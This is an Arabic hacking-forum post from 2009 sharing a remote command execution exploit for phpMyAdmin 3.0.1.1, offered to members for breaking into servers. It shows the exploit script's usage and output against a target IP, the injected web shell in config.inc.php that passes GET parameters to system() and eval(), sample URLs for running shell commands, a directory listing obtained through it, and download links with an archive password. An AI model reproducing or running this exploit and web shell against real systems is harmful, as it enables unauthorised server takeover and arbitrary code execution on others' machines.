التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-26-2009, 09:32 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Spiral
 

 

 
إحصائية العضو








Spiral غير متواجد حالياً

إرسال رسالة عبر MSN إلى Spiral

 

 

إحصائية الترشيح

عدد النقاط : 10
Spiral is on a distinguished road

Thumbs up phpMyAdmin ريموت كومند !! PoC


الســـــلام عليكم شباب ...



ظهرت ثغره قوية البارحة للPhpMyAdmin بلميل وورم مع انه صعب وجود اي ثغره فعاله كPoC/exploit لبرنامج مفتوح المصدر وشهير جدا ك PhpMyAdmin .

والجميل بلثغره انه مازالت امكانية وجود ثغرات ريموت كومند ( remote command execution ) او هيب اوفر فلو ( heap overflow ) او حتى سيكيول انجكشن ك ( xp_cmdshell - cmd - etc ) .

وطبعا حصريا لشباب منتدى سيكيورتي رولز وصلني البارحة من صديق عزيز ريموت كومند للثغره بحيث نقدر من خلال الشل كود هذا نقوم بإختراق السيرفر ( نبرء ذمتي وذمة الشباب من اي عملية اختراق عربية )

كود PHP:
./SEC-R1Z_ _ _ _  _ _ _   _ _ _ _ _ _ _ _ _ _ _ _ _ __  
  
/ /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
    \
_ _ _ _/  /_ _ /  /    __ |  ()   / |  |   /   /
   \
_ _ _ _/  /_ _ /  /    |__||      /  |  |  /   / 
    
_ _ _ _\  \_ _ \  \2_0_0_9 |      \  |  | /   /_ _  
  
/_ _ _ _ __ _ _/\ _ _ _ /  |__|\ __\ |__|/./J0_ _\_

[b0x@r1z ~]./phpMyAdmin-sec-r1z.sh
usage
: ./phpMyAdmin-sec-r1z.sh 
i
.e.: ./phpMyAdmin-sec-r1z.sh http://target.tld/phpMyAdmin/

[b0x@r1z ~]./phpMyAdmin-sec-r1z.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] 
phpMyAdmin ****** and form token received successfullyGood!
[+] 
attempting to inject phpinfo() ...
[+] 
successphpinfo() injected successfullyoutput saved on /tmp/phpMyAdmin-sec-r1z.sh.9217.phpinfo.r1z.html
[+] you *shouldnow be able to remotely run shell commands and PHP code using your browseri.e.:
    
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
    
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
    
please send any feedback/improvements for this script to unknown.pentestergmail.com

[b0x@r1z ~]curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr
-xr-x   2 root   root  4096 Mar 11 10:12 bin
drwxr
-xr-x   3 root   root  4096 May  6 10:01 boot
drwxr
-xr-x  15 root   root 14300 Jun  5 09:02 dev
drwxr
-xr-x 147 root   root 12288 Jun  5 09:02 etc
drwxr
-xr-x   3 root   root  4096 Oct 18  2008 home
drwxr
-xr-x   2 root   root  4096 Jul  2  2008 r1z 
طبعا السكربت مو برمجتي وماله علاقه بمنتدانا ! فقط للتنويه

اللحين بعد تشغيل السكربت لل

كود PHP:
/config/config.inc.php 
تم حقن الايفل كود حقنا ( السورس كود )

كود PHP:
<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>
 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
 * Date: Tue, 09 Jun 2009 14:13:34 GMT
 */

/* Servers configuration */
$i 0;

/* Server  (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */

?>
باسوورد الباش سكربت
www.sec-r1z.com



رابط الفيديو مضغوط اول شي rar ومن ثم zip لاجل حجمه بلتحميل ...

كود PHP:
http://rapidshare.com/files/243217562/_sec-r1z.com.zip 
تحياتي .

يرجى ذكر المصدر عند النقل
SecurityRules

www.sec-r1z.com

منقووول



phpMyAdmin vdl,j ;,lk] !! PoC

الملفات المرفقة
نوع الملف: zip PoC.zip‏ (2.4 كيلوبايت, المشاهدات 18)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع

J0rd4n14n/.

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
شرح الاستهداف بأستخدام phpmyadmin claw قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 8 02-01-2011 09:03 AM
phpMyAdmin - Erreur hack!n9 جـــ'ابات العناكــ'ب 3 09-06-2010 12:23 AM
2.6 sctp_houdini ريموت جديد ! شــرح Spiral قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 4 09-29-2009 01:33 AM


الساعة الآن 05:10 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0